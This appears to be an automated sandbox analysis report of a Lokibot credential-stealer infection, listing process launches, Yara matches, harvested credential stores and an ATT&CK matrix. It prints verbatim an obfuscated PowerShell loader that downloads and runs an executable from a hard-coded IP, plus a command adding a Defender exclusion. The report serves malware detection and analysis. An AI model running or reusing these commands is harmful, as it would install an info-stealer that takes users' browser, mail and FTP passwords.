Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\wininit.exe

Memory written: C:\Users\user\AppData\Roaming\wininit.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Queries volume information: C:\Users\user\AppData\Roaming\wininit.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wininit.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\wininit.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\wininit.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\wininit.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation

Source: C:\Users\user\AppData\Roaming\wininit.exe

Code function: 18_2_00406069 GetUserNameW,

18_2_00406069

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000012.00000002.654667913.0000000000534000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\AppData\Roaming\wininit.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Users\user\AppData\Roaming\wininit.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: PopPassword		18_2_0040D069
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: SmtpPassword		18_2_0040D069

Source: Yara match	File source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	33 Exploitation for Client Execution	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 Account Discovery	Remote Services	1 Archive Collected Data	35 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	2 File and Directory Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	111 Process Injection	3 Obfuscated Files or Information	Security Account Manager	14 System Information Discovery	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Security Software Discovery	Distributed Component Object Model	11 Email Collection	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
